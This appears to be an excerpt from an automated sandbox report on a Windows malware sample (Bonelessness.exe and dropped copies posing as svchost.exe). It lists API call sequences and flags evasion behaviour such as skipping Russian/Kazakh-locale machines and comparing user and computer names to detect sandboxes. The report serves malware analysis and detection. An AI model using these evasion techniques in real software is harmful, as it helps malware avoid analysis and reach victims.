Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D248C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	1_2_02D248C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028948C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	5_2_028948C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_024448C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	6_2_024448C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E48C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	8_2_012E48C0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	0_2_00403920
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	0_2_00402B70
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	1_2_00403920
Source: C:\Windows\apppatch\svchost.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	1_2_00402B70
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	1_2_02D35230
Source: C:\Windows\apppatch\svchost.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	1_2_02D43B90
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserNameA,memset,StrStrIA,	1_2_02D3A8E0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	1_2_02D421E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	1_2_02D21170
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	1_2_02D41160
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	1_2_02D43910
Source: C:\Windows\apppatch\svchost.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	1_2_02D3C900
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	1_2_02D21660
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	1_2_02D427C0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,	1_2_02D237E0
Source: C:\Windows\apppatch\svchost.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	1_2_02D2D7A0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	1_2_02D42750
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	1_2_02D40F40
Source: C:\Windows\apppatch\svchost.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	1_2_02D27D50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	5_2_028A67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	5_2_028A5230
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	5_2_028B3B90
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserNameA,memset,StrStrIA,	5_2_028AA8E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	5_2_028B21E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	5_2_028AC900
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	5_2_028B3910
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	5_2_028B1160
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	5_2_02891170
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	5_2_02891660
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	5_2_0289D7A0
